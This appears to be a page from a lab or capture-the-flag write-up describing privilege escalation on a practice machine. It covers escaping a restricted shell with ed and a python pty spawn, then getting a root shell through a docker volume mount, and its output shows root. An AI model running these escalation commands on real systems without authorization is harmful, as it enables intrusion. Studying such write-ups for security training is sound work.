Priv Escalation

Breaking out of RSHELL

I first tried to use the following articles.

https://oscpnotes.infosecsanyam.in/My_OSCP_Preparation_Notes--Enumeration--SSH--rbash_shell_esacping.htmloscpnotes.infosecsanyam.in

This one didn't work.

https://www.metahackers.pro/breakout-of-restricted-shell/www.metahackers.pro

This one also didn't work however after seeing my $PATH, I was able to see the commands I was able to run.

After seeing the commands the current shell was able to run I went to gtfobins.

ed | GTFOBinsgtfobins.github.io

The ed binary allows us to escape a restricted shell.

We then run the following command to export a new $PATH.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

Enumerate images

docker | GTFOBinsgtfobins.github.io

Based on the images run the following command:

docker run -v /:/mnt --rm -it redmine chroot /mnt sh

eleanor@peppo:/tmp$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# whoami
root

PreviousExploitation

Last updated 3 years ago